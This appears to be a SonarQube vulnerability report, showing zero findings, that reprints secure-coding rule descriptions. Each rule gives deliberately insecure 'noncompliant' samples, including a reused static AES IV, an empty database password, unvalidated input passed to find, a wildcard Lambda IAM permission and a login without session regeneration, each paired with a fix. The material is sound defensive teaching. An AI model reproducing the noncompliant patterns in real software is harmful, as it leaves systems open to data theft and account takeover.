SonarQube Vulnerability Report

Report Generated On
Thursday, Sep 21, 2023
Project Name/URL
Sonar Report
Application
sonar-report
Release
1.0.0
Branch
master
Delta Analysis
No

Summary of the Detected Vulnerabilities

Severity Number of Issues
HIGH 0
MEDIUM 0
LOW 0

Known Security Rules

Rule Description
vbnet:S3884

This rule is deprecated, and will eventually be removed.

Why is this an issue?

CoSetProxyBlanket and CoInitializeSecurity both work to set the permissions context in which the process invoked immediately after is executed. Calling them from within that process is useless because it’s too late at that point; the permissions context has already been set.

Specifically, these methods are meant to be called from non-managed code such as a C++ wrapper that then invokes the managed, i.e. C# or VB.NET, code.

Noncompliant code example

Public Class Noncompliant

    <DllImport("ole32.dll")>
    Public Shared Function CoSetProxyBlanket(<MarshalAs(UnmanagedType.IUnknown)>pProxy As Object, dwAuthnSvc as UInt32, dwAuthzSvc As UInt32, <MarshalAs(UnmanagedType.LPWStr)> pServerPrincName As String, dwAuthnLevel As UInt32, dwImpLevel As UInt32, pAuthInfo As IntPtr, dwCapabilities As UInt32) As Integer
    End Function

    Public Enum RpcAuthnLevel
        [Default] = 0
        None = 1
        Connect = 2
        [Call] = 3
        Pkt = 4
        PktIntegrity = 5
        PktPrivacy = 6
    End Enum

    Public Enum RpcImpLevel
        [Default] = 0
        Anonymous = 1
        Identify = 2
        Impersonate = 3
        [Delegate] = 4
    End Enum

    Public Enum EoAuthnCap
        None = &H00
        MutualAuth = &H01
        StaticCloaking = &H20
        DynamicCloaking = &H40
        AnyAuthority = &H80
        MakeFullSIC = &H100
        [Default] = &H800
        SecureRefs = &H02
        AccessControl = &H04
        AppID = &H08
        Dynamic = &H10
        RequireFullSIC = &H200
        AutoImpersonate = &H400
        NoCustomMarshal = &H2000
        DisableAAA = &H1000
    End Enum

    <DllImport("ole32.dll")>
    Public Shared Function CoInitializeSecurity(pVoid As IntPtr, cAuthSvc As Integer, asAuthSvc As IntPtr, pReserved1 As IntPtr, level As RpcAuthnLevel, impers As RpcImpLevel, pAuthList As IntPtr, dwCapabilities As EoAuthnCap, pReserved3 As IntPtr) As Integer
    End Function

    Public Sub DoSomething()
        Dim Hres1 As Integer = CoSetProxyBlanket(Nothing, 0, 0, Nothing, 0, 0, IntPtr.Zero, 0) ' Noncompliant
        Dim Hres2 As Integer = CoInitializeSecurity(IntPtr.Zero, -1, IntPtr.Zero, IntPtr.Zero, RpcAuthnLevel.None, RpcImpLevel.Impersonate, IntPtr.Zero, EoAuthnCap.None, IntPtr.Zero) ' Noncompliant
    End Sub

End Class

Resources

csharpsquid:S3884

This rule is deprecated, and will eventually be removed.

Why is this an issue?

CoSetProxyBlanket and CoInitializeSecurity both work to set the permissions context in which the process invoked immediately after is executed. Calling them from within that process is useless because it’s too late at that point; the permissions context has already been set.

Specifically, these methods are meant to be called from non-managed code such as a C++ wrapper that then invokes the managed, i.e. C# or VB.NET, code.

Noncompliant code example

[DllImport("ole32.dll")]
static extern int CoSetProxyBlanket([MarshalAs(UnmanagedType.IUnknown)]object pProxy, uint dwAuthnSvc, uint dwAuthzSvc,
	[MarshalAs(UnmanagedType.LPWStr)] string pServerPrincName, uint dwAuthnLevel, uint dwImpLevel, IntPtr pAuthInfo,
	uint dwCapabilities);

public enum RpcAuthnLevel
{
	Default = 0,
	None = 1,
	Connect = 2,
	Call = 3,
	Pkt = 4,
	PktIntegrity = 5,
	PktPrivacy = 6
}

public enum RpcImpLevel
{
	Default = 0,
	Anonymous = 1,
	Identify = 2,
	Impersonate = 3,
	Delegate = 4
}

public enum EoAuthnCap
{
	None = 0x00,
	MutualAuth = 0x01,
	StaticCloaking = 0x20,
	DynamicCloaking = 0x40,
	AnyAuthority = 0x80,
	MakeFullSIC = 0x100,
	Default = 0x800,
	SecureRefs = 0x02,
	AccessControl = 0x04,
	AppID = 0x08,
	Dynamic = 0x10,
	RequireFullSIC = 0x200,
	AutoImpersonate = 0x400,
	NoCustomMarshal = 0x2000,
	DisableAAA = 0x1000
}

[DllImport("ole32.dll")]
public static extern int CoInitializeSecurity(IntPtr pVoid, int cAuthSvc, IntPtr asAuthSvc, IntPtr pReserved1,
	RpcAuthnLevel level, RpcImpLevel impers, IntPtr pAuthList, EoAuthnCap dwCapabilities, IntPtr pReserved3);

static void Main(string[] args)
{
	var hres1 = CoSetProxyBlanket(null, 0, 0, null, 0, 0, IntPtr.Zero, 0); // Noncompliant

	var hres2 = CoInitializeSecurity(IntPtr.Zero, -1, IntPtr.Zero, IntPtr.Zero, RpcAuthnLevel.None,
		RpcImpLevel.Impersonate, IntPtr.Zero, EoAuthnCap.None, IntPtr.Zero); // Noncompliant
}

Resources

docker:S6471

Running containers as a privileged user weakens their runtime security, allowing any user whose code runs on the container to perform administrative actions.
In Linux containers, the privileged user is usually named root. In Windows containers, the equivalent is ContainerAdministrator.

A malicious user can run code on a system either thanks to actions that could be deemed legitimate - depending on internal business logic or operational management shells - or thanks to malicious actions. For example, with arbitrary code execution after exploiting a service that the container hosts.

Suppose the container is not hardened to prevent using a shell, interpreter, or Linux capabilities. In this case, the malicious user can read and exfiltrate any file (including Docker volumes), open new network connections, install malicious software, or, worse, break out of the container’s isolation context by exploiting other components.

This means giving the possibility to attackers to steal important infrastructure files, intellectual property, or personal data.

Depending on the infrastructure’s resilience, attackers may then extend their attack to other services, such as Kubernetes clusters or cloud providers, in order to maximize their reach.

Ask Yourself Whether

This container:

  • Serves services accessible from the Internet.
  • Does not require a privileged user to run.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

In the Dockerfile:

  • Create a new default user and use it with the USER statement.
    • Some container maintainers create a specific user to be used without explicitly setting it as default, such as postgresql or zookeeper. It is recommended to use these users instead of root.
    • On Windows containers, the ContainerUser is available for this purpose.

Or, at launch time:

  • Use the user argument when calling Docker or in the docker-compose file.
  • Add fine-grained Linux capabilities to perform specific actions that require root privileges.

If this image is already explicitly set to launch with a non-privileged user, you can add it to the safe images list rule property of your SonarQube instance, without the tag.

Sensitive Code Example

For any image that does not provide a user by default, regardless of their underlying operating system:

# Sensitive
FROM alpine

ENTRYPOINT ["id"]

For multi-stage builds, the last stage is non-compliant if it does not contain the USER instruction with a non-root user:

FROM alpine AS builder
COPY Makefile ./src /
RUN make build
USER nonroot

# Sensitive, previous user settings are dropped
FROM alpine AS runtime
COPY --from=builder bin/production /app
ENTRYPOINT ["/app/production"]

Compliant Solution

For Linux-based images:

FROM alpine

RUN addgroup -S nonroot \
    && adduser -S nonroot -G nonroot

USER nonroot

ENTRYPOINT ["id"]

For Windows-based images, you can use ContainerUser or create a new user:

FROM mcr.microsoft.com/windows/servercore:ltsc2019

RUN net user /add nonroot

USER nonroot

If the scratch Dockerfile untars a Linux distribution, the "Linux image" solution should be applied. Else, you have a choice between using a pre-written /etc/passwd file (regardless of the host operating system) or using a multi-stage build.

FROM scratch

COPY etc_passwd /etc/passwd
# contains "nonroot:x:1337:1337:nonroot:/nonroot:/usr/sbin/nologin"

USER nonroot

COPY production_binary /app

ENTRYPOINT ["/app/production_binary"]

or you can use a multi-stage build:

FROM alpine:latest as security_provider
RUN addgroup -S nonroot \
    && adduser -S nonroot -G nonroot

FROM scratch as production
COPY --from=security_provider /etc/passwd /etc/passwd
USER nonroot
COPY production_binary /app
ENTRYPOINT ["/app/production_binary"]

For multi-stage builds:

FROM alpine as builder
COPY Makefile ./src /
RUN make build

FROM alpine as runtime
RUN addgroup -S nonroot \
    && adduser -S nonroot -G nonroot
COPY --from=builder bin/production /app
USER nonroot
ENTRYPOINT ["/app/production"]

See

roslyn.sonaranalyzer.security.cs:S6350

Constructing arguments of system commands from user input is security-sensitive. It has led in the past to the following vulnerabilities:

Arguments of system commands are processed by the executed program. The arguments are usually used to configure and influence the behavior of the programs. Control over a single argument might be enough for an attacker to trigger dangerous features like executing arbitrary commands or writing files into specific directories.

Ask Yourself Whether

  • Malicious arguments can result in undesired behavior in the executed command.
  • Passing user input to a system command is not necessary.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Avoid constructing system commands from user input when possible.
  • Ensure that no risky arguments can be injected for the given program, e.g., type-cast the argument to an integer.
  • Use a more secure interface to communicate with other programs, e.g., the standard input stream (stdin).

Sensitive Code Example

Arguments like -delete or -exec for the find command can alter the expected behavior and result in vulnerabilities:

using System.Diagnostics;
Process p = new Process();
p.StartInfo.FileName = "/usr/bin/find";
p.StartInfo.ArgumentList.Add(input); // Sensitive

Compliant Solution

Use an allow-list to restrict the arguments to trusted values:

using System.Diagnostics;
Process p = new Process();
p.StartInfo.FileName = "/usr/bin/find";
if (allowed.Contains(input)) {
  p.StartInfo.ArgumentList.Add(input);
}

See

vbnet:S3329

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

In the mode Cipher Block Chaining (CBC), each block is used as cryptographic input for the next block. For this reason, the first block requires an initialization vector (IV), also called a "starting variable" (SV).

If the same IV is used for multiple encryption sessions or messages, each new encryption of the same plaintext input would always produce the same ciphertext output. This may allow an attacker to detect patterns in the ciphertext.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it on a given timeframe, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, a company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in .NET

Code examples

Noncompliant code example

Imports System.IO
Imports System.Security.Cryptography

Public Sub Encrypt(key As Byte(), dataToEncrypt As Byte(), target As MemoryStream)
    Dim aes = New AesCryptoServiceProvider()

    Dim iv = New Byte() {1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16}
    Dim encryptor = aes.CreateEncryptor(key, iv) ' Noncompliant

    Dim cryptoStream = New CryptoStream(target, encryptor, CryptoStreamMode.Write)
    Dim swEncrypt = New StreamWriter(cryptoStream)

    swEncrypt.Write(dataToEncrypt)
End Sub

Compliant solution

In this example, the code implicitly uses a number generator that is considered strong, thanks to aes.IV.

Imports System.IO
Imports System.Security.Cryptography

Public Sub Encrypt(key As Byte(), dataToEncrypt As Byte(), target As MemoryStream)
    Dim aes = New AesCryptoServiceProvider()

    Dim encryptor = aes.CreateEncryptor(key, aes.IV)

    Dim cryptoStream = New CryptoStream(target, encryptor, CryptoStreamMode.Write)
    Dim swEncrypt = New StreamWriter(cryptoStream)

    swEncrypt.Write(dataToEncrypt)
End Sub

How does this work?

Use unique IVs

To ensure high security, initialization vectors must meet two important criteria:

  • IVs must be unique for each encryption operation.
  • For CBC and CFB modes, a secure FIPS-compliant random number generator should be used to generate unpredictable IVs.

The IV does not need be secret, so the IV or information sufficient to determine the IV may be transmitted along with the ciphertext.

In the previous non-compliant example, the problem is not that the IV is hard-coded.
It is that the same IV is used for multiple encryption attempts.

Resources

Standards

typescript:S5876

An attacker may trick a user into using a predetermined session identifier. Consequently, this attacker can gain unauthorized access and impersonate the user’s session. This kind of attack is called session fixation, and protections against it should not be disabled.

Why is this an issue?

Session fixation attacks take advantage of the way web applications manage session identifiers. Here’s how a session fixation attack typically works:

  • When a user visits a website or logs in, a session is created for them.
  • This session is assigned a unique session identifier, stored in a cookie, in local storage, or through URL parameters.
  • In a session fixation attack, an attacker tricks a user into using a predetermined session identifier controlled by the attacker. For example, the attacker sends the victim an email containing a link with this predetermined session identifier.
  • When the victim clicks on the link, the web application does not create a new session identifier but uses this identifier known to the attacker.
  • At this point, the attacker can hijack and impersonate the victim’s session.

What is the potential impact?

Session fixation attacks pose a significant security risk to web applications and their users. By exploiting this vulnerability, attackers can gain unauthorized access to user sessions, potentially leading to various malicious activities. Some of the most relevant scenarios are the following:

Impersonation

Once an attacker successfully fixes a session identifier, they can impersonate the victim and gain access to their account without providing valid credentials. This can result in unauthorized actions, such as modifying personal information, making unauthorized transactions, or even performing malicious activities on behalf of the victim. An attacker can also manipulate the victim into performing actions they wouldn’t normally do, such as revealing sensitive information or conducting financial transactions on the attacker’s behalf.

Data Breach

If an attacker gains access to a user’s session, they may also gain access to sensitive data associated with that session. This can include personal information, financial details, or any other confidential data that the user has access to within the application. The compromised data can be used for identity theft, financial fraud, or other malicious purposes.

Privilege Escalation

In some cases, session fixation attacks can be used to escalate privileges within a web application. By fixing a session identifier with higher privileges, an attacker can bypass access controls and gain administrative or privileged access to the application. This can lead to unauthorized modifications, data manipulation, or even complete compromise of the application and its underlying systems.

How to fix it in Passport

Code examples

Upon user authentication, it is crucial to regenerate the session identifier to prevent fixation attacks. Passport provides a mechanism to achieve this by using the req.session.regenerate() method. By calling this method after successful authentication, you can ensure that each user is assigned a new and unique session ID.

Noncompliant code example

app.post('/login',
  passport.authenticate('local', { failureRedirect: '/login' }),
  function(req, res) {
    // Noncompliant - no session.regenerate after login
    res.redirect('/');
  });

Compliant solution

app.post('/login',
  passport.authenticate('local', { failureRedirect: '/login' }),
  function(req, res) {
    let prevSession = req.session;
    req.session.regenerate((err) => {
      Object.assign(req.session, prevSession);
      res.redirect('/');
    });
  });

How does this work?

The protection works by ensuring that the session identifier, which is used to identify and track a user’s session, is changed or regenerated during the authentication process.

Here’s how session fixation protection typically works:

  1. When a user visits a website or logs in, a session is created for them. This session is assigned a unique session identifier, which is stored in a cookie or passed through URL parameters.
  2. In a session fixation attack, an attacker tricks a user into using a predetermined session identifier controlled by the attacker. This allows the attacker to potentially gain unauthorized access to the user’s session.
  3. To protect against session fixation attacks, session fixation protection mechanisms come into play during the authentication process. When a user successfully authenticates, this mechanism generates a new session identifier for the user’s session.
  4. The old session identifier, which may have been manipulated by the attacker, is invalidated and no longer associated with the user’s session. This ensures that any attempts by the attacker to use the fixed session identifier are rendered ineffective.
  5. The user is then assigned the new session identifier, which is used for subsequent requests and session tracking. This new session identifier is typically stored in a new session cookie or passed through URL parameters.

By regenerating the session identifier upon authentication, session fixation protection helps ensure that the user’s session is tied to a new, secure identifier that the attacker cannot predict or control. This mitigates the risk of an attacker gaining unauthorized access to the user’s session and helps maintain the integrity and security of the application’s session management process.

Resources

Documentation

Articles & blog posts

Standards

typescript:S6317

Within IAM, identity-based policies grant permissions to users, groups, or roles, and enable specific actions to be performed on designated resources. When an identity policy inadvertently grants more privileges than intended, certain users or roles might be able to perform more actions than expected. This can lead to potential security risks, as it enables malicious users to escalate their privileges from a lower level to a higher level of access.

Why is this an issue?

AWS Identity and Access Management (IAM) is the service that defines access to AWS resources. One of the core components of IAM is the policy which, when attached to an identity or a resource, defines its permissions. Policies granting permission to an identity (a user, a group or a role) are called identity-based policies. They add the ability to an identity to perform a predefined set of actions on a list of resources.

For such policies, it is easy to define very broad permissions (by using wildcard "*" permissions for example.) This is especially true if it is not yet clear which permissions will be required for a specific workload or use case. However, it is important to limit the amount of permissions that are granted and the amount of resources to which these permissions are granted. Doing so ensures that there are no users or roles that have more permissions than they need.

If this is not done, it can potentially carry security risks in the case that an attacker gets access to one of these identities.

What is the potential impact?

AWS IAM policies that contain overly broad permissions can lead to privilege escalation by granting users more access than necessary. They may be able to perform actions beyond their intended scope.

Privilege escalation

When IAM policies are too permissive, they grant users more privileges than necessary, allowing them to perform actions that they should not be able to. This can be exploited by attackers to gain unauthorized access to sensitive resources and perform malicious activities.

For example, if an IAM policy grants a user unrestricted access to all S3 buckets in an AWS account, the user can potentially read, write, and delete any object within those buckets. If an attacker gains access to this user’s credentials, they can exploit this overly permissive policy to exfiltrate sensitive data, modify or delete critical files, or even launch further attacks within the AWS environment. This can have severe consequences, such as data breaches, service disruptions, or unauthorized access to other resources within the AWS account.

How to fix it in AWS CDK

Code examples

In this example, the IAM policy allows an attacker to update the code of any Lambda function. An attacker can achieve privilege escalation by altering the code of a Lambda that executes with high privileges.

Noncompliant code example

import { aws_iam as iam } from 'aws-cdk-lib'

new iam.PolicyDocument({
    statements: [new iam.PolicyStatement({
        effect: iam.Effect.ALLOW,
        actions: ["lambda:UpdateFunctionCode"],
        resources: ["*"], // Noncompliant
    })],
});

Compliant solution

The policy is narrowed such that only updates to the code of certain Lambda functions (without high privileges) are allowed.

import { aws_iam as iam } from 'aws-cdk-lib'

new iam.PolicyDocument({
    statements: [new iam.PolicyStatement({
        effect: iam.Effect.ALLOW,
        actions: ["lambda:UpdateFunctionCode"],
        resources: ["arn:aws:lambda:us-east-2:123456789012:function:my-function:1"],
    })],
});

How does this work?

Principle of least privilege

When creating IAM policies, it is important to adhere to the principle of least privilege. This means that any user or role should only be granted enough permissions to perform the tasks that they are supposed to, and nothing else.

To successfully implement this, it is easier to start from nothing and gradually build up all the needed permissions. When starting from a policy with overly broad permissions which is made stricter at a later time, it can be harder to ensure that there are no gaps that might be forgotten about. In this case, it might be useful to monitor the users or roles to verify which permissions are used.

Resources

Documentation

Articles & blog posts

Standards

typescript:S5689

Disclosure of version information, usually overlooked by developers but disclosed by default by the systems and frameworks in use, can pose a significant security risk depending on the production environement.

Once this information is public, attackers can use it to identify potential security holes or vulnerabilities specific to that version.

Furthermore, if the published version information indicates the use of outdated or unsupported software, it becomes easier for attackers to exploit known vulnerabilities. They can search for published vulnerabilities related to that version and launch attacks that specifically target those vulnerabilities.

Ask Yourself Whether

  • Version information is accessible to end users.
  • Internal systems do not benefit from timely patch management workflows.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

In general, it is recommended to keep internal technical information within internal systems to control what attackers know about the underlying architectures. This is known as the "need to know" principle.

The most effective solution is to remove version information disclosure from what end users can see, such as the "x-powered-by" header.
This can be achieved directly through the web application code, server (nginx, apache) or firewalls.

Disabling the server signature provides additional protection by reducing the amount of information available to attackers. Note, however, that this does not provide as much protection as regular updates and patches.
Security by obscurity is the least foolproof solution of all. It should never be the only defense mechanism and should always be combined with other security measures.

Sensitive Code Example

In Express.js, version information is disclosed by default in the x-powered-by HTTP header:

let express = require('express');

let example = express(); // Sensitive

example.get('/', function (req, res) {
  res.send('example')
});

Compliant Solution

x-powered-by HTTP header should be disabled in Express.js with app.disable:

let express = require('express');

let example = express();
example.disable("x-powered-by");

Or with helmet’s hidePoweredBy middleware:

let helmet = require("helmet");

let example = express();
example.use(helmet.hidePoweredBy());

See

javascript:S5876

An attacker may trick a user into using a predetermined session identifier. Consequently, this attacker can gain unauthorized access and impersonate the user’s session. This kind of attack is called session fixation, and protections against it should not be disabled.

Why is this an issue?

Session fixation attacks take advantage of the way web applications manage session identifiers. Here’s how a session fixation attack typically works:

  • When a user visits a website or logs in, a session is created for them.
  • This session is assigned a unique session identifier, stored in a cookie, in local storage, or through URL parameters.
  • In a session fixation attack, an attacker tricks a user into using a predetermined session identifier controlled by the attacker. For example, the attacker sends the victim an email containing a link with this predetermined session identifier.
  • When the victim clicks on the link, the web application does not create a new session identifier but uses this identifier known to the attacker.
  • At this point, the attacker can hijack and impersonate the victim’s session.

What is the potential impact?

Session fixation attacks pose a significant security risk to web applications and their users. By exploiting this vulnerability, attackers can gain unauthorized access to user sessions, potentially leading to various malicious activities. Some of the most relevant scenarios are the following:

Impersonation

Once an attacker successfully fixes a session identifier, they can impersonate the victim and gain access to their account without providing valid credentials. This can result in unauthorized actions, such as modifying personal information, making unauthorized transactions, or even performing malicious activities on behalf of the victim. An attacker can also manipulate the victim into performing actions they wouldn’t normally do, such as revealing sensitive information or conducting financial transactions on the attacker’s behalf.

Data Breach

If an attacker gains access to a user’s session, they may also gain access to sensitive data associated with that session. This can include personal information, financial details, or any other confidential data that the user has access to within the application. The compromised data can be used for identity theft, financial fraud, or other malicious purposes.

Privilege Escalation

In some cases, session fixation attacks can be used to escalate privileges within a web application. By fixing a session identifier with higher privileges, an attacker can bypass access controls and gain administrative or privileged access to the application. This can lead to unauthorized modifications, data manipulation, or even complete compromise of the application and its underlying systems.

How to fix it in Passport

Code examples

Upon user authentication, it is crucial to regenerate the session identifier to prevent fixation attacks. Passport provides a mechanism to achieve this by using the req.session.regenerate() method. By calling this method after successful authentication, you can ensure that each user is assigned a new and unique session ID.

Noncompliant code example

app.post('/login',
  passport.authenticate('local', { failureRedirect: '/login' }),
  function(req, res) {
    // Noncompliant - no session.regenerate after login
    res.redirect('/');
  });

Compliant solution

app.post('/login',
  passport.authenticate('local', { failureRedirect: '/login' }),
  function(req, res) {
    let prevSession = req.session;
    req.session.regenerate((err) => {
      Object.assign(req.session, prevSession);
      res.redirect('/');
    });
  });

How does this work?

The protection works by ensuring that the session identifier, which is used to identify and track a user’s session, is changed or regenerated during the authentication process.

Here’s how session fixation protection typically works:

  1. When a user visits a website or logs in, a session is created for them. This session is assigned a unique session identifier, which is stored in a cookie or passed through URL parameters.
  2. In a session fixation attack, an attacker tricks a user into using a predetermined session identifier controlled by the attacker. This allows the attacker to potentially gain unauthorized access to the user’s session.
  3. To protect against session fixation attacks, session fixation protection mechanisms come into play during the authentication process. When a user successfully authenticates, this mechanism generates a new session identifier for the user’s session.
  4. The old session identifier, which may have been manipulated by the attacker, is invalidated and no longer associated with the user’s session. This ensures that any attempts by the attacker to use the fixed session identifier are rendered ineffective.
  5. The user is then assigned the new session identifier, which is used for subsequent requests and session tracking. This new session identifier is typically stored in a new session cookie or passed through URL parameters.

By regenerating the session identifier upon authentication, session fixation protection helps ensure that the user’s session is tied to a new, secure identifier that the attacker cannot predict or control. This mitigates the risk of an attacker gaining unauthorized access to the user’s session and helps maintain the integrity and security of the application’s session management process.

Resources

Documentation

Articles & blog posts

Standards

javascript:S6317

Within IAM, identity-based policies grant permissions to users, groups, or roles, and enable specific actions to be performed on designated resources. When an identity policy inadvertently grants more privileges than intended, certain users or roles might be able to perform more actions than expected. This can lead to potential security risks, as it enables malicious users to escalate their privileges from a lower level to a higher level of access.

Why is this an issue?

AWS Identity and Access Management (IAM) is the service that defines access to AWS resources. One of the core components of IAM is the policy which, when attached to an identity or a resource, defines its permissions. Policies granting permission to an identity (a user, a group or a role) are called identity-based policies. They add the ability to an identity to perform a predefined set of actions on a list of resources.

For such policies, it is easy to define very broad permissions (by using wildcard "*" permissions for example.) This is especially true if it is not yet clear which permissions will be required for a specific workload or use case. However, it is important to limit the amount of permissions that are granted and the amount of resources to which these permissions are granted. Doing so ensures that there are no users or roles that have more permissions than they need.

If this is not done, it can potentially carry security risks in the case that an attacker gets access to one of these identities.

What is the potential impact?

AWS IAM policies that contain overly broad permissions can lead to privilege escalation by granting users more access than necessary. They may be able to perform actions beyond their intended scope.

Privilege escalation

When IAM policies are too permissive, they grant users more privileges than necessary, allowing them to perform actions that they should not be able to. This can be exploited by attackers to gain unauthorized access to sensitive resources and perform malicious activities.

For example, if an IAM policy grants a user unrestricted access to all S3 buckets in an AWS account, the user can potentially read, write, and delete any object within those buckets. If an attacker gains access to this user’s credentials, they can exploit this overly permissive policy to exfiltrate sensitive data, modify or delete critical files, or even launch further attacks within the AWS environment. This can have severe consequences, such as data breaches, service disruptions, or unauthorized access to other resources within the AWS account.

How to fix it in AWS CDK

Code examples

In this example, the IAM policy allows an attacker to update the code of any Lambda function. An attacker can achieve privilege escalation by altering the code of a Lambda that executes with high privileges.

Noncompliant code example

import { aws_iam as iam } from 'aws-cdk-lib'

new iam.PolicyDocument({
    statements: [new iam.PolicyStatement({
        effect: iam.Effect.ALLOW,
        actions: ["lambda:UpdateFunctionCode"],
        resources: ["*"], // Noncompliant
    })],
});

Compliant solution

The policy is narrowed such that only updates to the code of certain Lambda functions (without high privileges) are allowed.

import { aws_iam as iam } from 'aws-cdk-lib'

new iam.PolicyDocument({
    statements: [new iam.PolicyStatement({
        effect: iam.Effect.ALLOW,
        actions: ["lambda:UpdateFunctionCode"],
        resources: ["arn:aws:lambda:us-east-2:123456789012:function:my-function:1"],
    })],
});

How does this work?

Principle of least privilege

When creating IAM policies, it is important to adhere to the principle of least privilege. This means that any user or role should only be granted enough permissions to perform the tasks that they are supposed to, and nothing else.

To successfully implement this, it is easier to start from nothing and gradually build up all the needed permissions. When starting from a policy with overly broad permissions which is made stricter at a later time, it can be harder to ensure that there are no gaps that might be forgotten about. In this case, it might be useful to monitor the users or roles to verify which permissions are used.

Resources

Documentation

Articles & blog posts

Standards

javascript:S5689

Disclosure of version information, usually overlooked by developers but disclosed by default by the systems and frameworks in use, can pose a significant security risk depending on the production environement.

Once this information is public, attackers can use it to identify potential security holes or vulnerabilities specific to that version.

Furthermore, if the published version information indicates the use of outdated or unsupported software, it becomes easier for attackers to exploit known vulnerabilities. They can search for published vulnerabilities related to that version and launch attacks that specifically target those vulnerabilities.

Ask Yourself Whether

  • Version information is accessible to end users.
  • Internal systems do not benefit from timely patch management workflows.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

In general, it is recommended to keep internal technical information within internal systems to control what attackers know about the underlying architectures. This is known as the "need to know" principle.

The most effective solution is to remove version information disclosure from what end users can see, such as the "x-powered-by" header.
This can be achieved directly through the web application code, server (nginx, apache) or firewalls.

Disabling the server signature provides additional protection by reducing the amount of information available to attackers. Note, however, that this does not provide as much protection as regular updates and patches.
Security by obscurity is the least foolproof solution of all. It should never be the only defense mechanism and should always be combined with other security measures.

Sensitive Code Example

In Express.js, version information is disclosed by default in the x-powered-by HTTP header:

let express = require('express');

let example = express(); // Sensitive

example.get('/', function (req, res) {
  res.send('example')
});

Compliant Solution

x-powered-by HTTP header should be disabled in Express.js with app.disable:

let express = require('express');

let example = express();
example.disable("x-powered-by");

Or with helmet’s hidePoweredBy middleware:

let helmet = require("helmet");

let example = express();
example.use(helmet.hidePoweredBy());

See

csharpsquid:S2115

When accessing a database, an empty password should be avoided as it introduces a weakness.

Why is this an issue?

When a database does not require a password for authentication, it allows anyone to access and manipulate the data stored within it. Exploiting this vulnerability typically involves identifying the target database and establishing a connection to it without the need for any authentication credentials.

What is the potential impact?

Once connected, an attacker can perform various malicious actions, such as viewing, modifying, or deleting sensitive information, potentially leading to data breaches or unauthorized access to critical systems. It is crucial to address this vulnerability promptly to ensure the security and integrity of the database and the data it contains.

Unauthorized Access to Sensitive Data

When a database lacks a password for authentication, it opens the door for unauthorized individuals to gain access to sensitive data. This can include personally identifiable information (PII), financial records, intellectual property, or any other confidential information stored in the database. Without proper access controls in place, malicious actors can exploit this vulnerability to retrieve sensitive data, potentially leading to identity theft, financial loss, or reputational damage.

Compromise of System Integrity

Without a password requirement, unauthorized individuals can gain unrestricted access to a database, potentially compromising the integrity of the entire system. Attackers can inject malicious code, alter configurations, or manipulate data within the database, leading to system malfunctions, unauthorized system access, or even complete system compromise. This can disrupt business operations, cause financial losses, and expose the organization to further security risks.

Unwanted Modifications or Deletions

The absence of a password for database access allows anyone to make modifications or deletions to the data stored within it. This poses a significant risk, as unauthorized changes can lead to data corruption, loss of critical information, or the introduction of malicious content. For example, an attacker could modify financial records, tamper with customer orders, or delete important files, causing severe disruptions to business processes and potentially leading to financial and legal consequences.

Overall, the lack of a password configured to access a database poses a serious security risk, enabling unauthorized access, data breaches, system compromise, and unwanted modifications or deletions. It is essential to address this vulnerability promptly to safeguard sensitive data, maintain system integrity, and protect the organization from potential harm.

How to fix it in Entity Framework Core

Code examples

The following code uses an empty password to connect to a SQL Server database.

The vulnerability can be fixed by using Windows authentication (sometimes referred to as integrated security).

Noncompliant code example

protected override void OnConfiguring(DbContextOptionsBuilder optionsBuilder)
{
  optionsBuilder.UseSqlServer("Server=myServerAddress;Database=myDataBase;User Id=myUsername;Password="); // Noncompliant
}

Compliant solution

protected override void OnConfiguring(DbContextOptionsBuilder optionsBuilder)
{
  optionsBuilder.UseSqlServer("Server=myServerAddress;Database=myDataBase;Integrated Security=True");
}

How does this work?

Windows authentication (integrated security)

When the connection string includes the Integrated Security=true parameter, it enables Windows authentication (sometimes called integrated security) for the database connection. With integrated security, the user’s Windows credentials are used to authenticate and authorize access to the database. It eliminates the need for a separate username and password for the database connection. Integrated security simplifies authentication and leverages the existing Windows authentication infrastructure for secure database access in your C# application.

It’s important to note that when using integrated security, the user running the application must have the necessary permissions to access the database. Ensure that the user account running the application has the appropriate privileges and is granted access to the database.

The syntax employed in connection strings varies by provider:

Syntax

Supported by

Integrated Security=true;

SQL Server, Oracle, Postgres

Integrated Security=SSPI;

SQL Server, OLE DB

Integrated Security=yes;

MySQL

Trusted_Connection=true;

SQL Server

Trusted_Connection=yes;

ODBC

Note: Some providers such as MySQL do not support Windows authentication with .NET Core.

Pitfalls

Hard-coded passwords

It could be tempting to replace the empty password with a hard-coded one. Hard-coding passwords in the code can pose significant security risks. Here are a few reasons why it is not recommended:

  1. Security Vulnerability: Hard-coded passwords can be easily discovered by anyone who has access to the code, such as other developers or attackers. This can lead to unauthorized access to the database and potential data breaches.
  2. Lack of Flexibility: Hard-coded passwords make it difficult to change the password without modifying the code. If the password needs to be updated, it would require recompiling and redeploying the code, which can be time-consuming and error-prone.
